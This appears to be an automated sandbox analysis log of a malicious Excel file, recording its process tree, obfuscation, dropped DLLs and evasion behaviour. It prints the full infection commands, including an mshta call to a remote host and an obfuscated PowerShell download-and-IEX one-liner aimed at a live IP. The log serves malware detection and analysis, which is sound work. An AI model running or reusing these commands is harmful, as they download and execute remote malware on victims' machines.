Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiE
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSb
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.html Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiE Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSb Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREE44.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: 54C4.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\mshta.exe Code function: 4_3_029408CA push 8B49024Bh; iretd 4_3_029408CF
Source: C:\Windows\System32\mshta.exe Code function: 4_3_029400BC push 8B49024Bh; iretd 4_3_029400C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017114C push ds; ret 9_2_0017114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001715F5 push cs; retf 9_2_001715FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022114C push ds; ret 10_2_0022114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002215F5 push cs; retf 10_2_002215FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B114C push ds; ret 11_2_001B114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B15F5 push cs; retf 11_2_001B15FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0077114C push ds; ret 12_2_0077114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007715F5 push cs; retf 12_2_007715FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F114C push ds; ret 14_2_005F114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_005F15F5 push cs; retf 14_2_005F15FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001D114C push ds; ret 15_2_001D114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001D15F5 push cs; retf 15_2_001D15FE
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
PE file contains an invalid checksum
Source: QWER.dll.6.dr Static PE information: real checksum: 0x8f55d should be: 0x94fc5

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq (copy) Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 1496 Thread sleep time: -180000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000006.00000002.682247362.00000000002C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

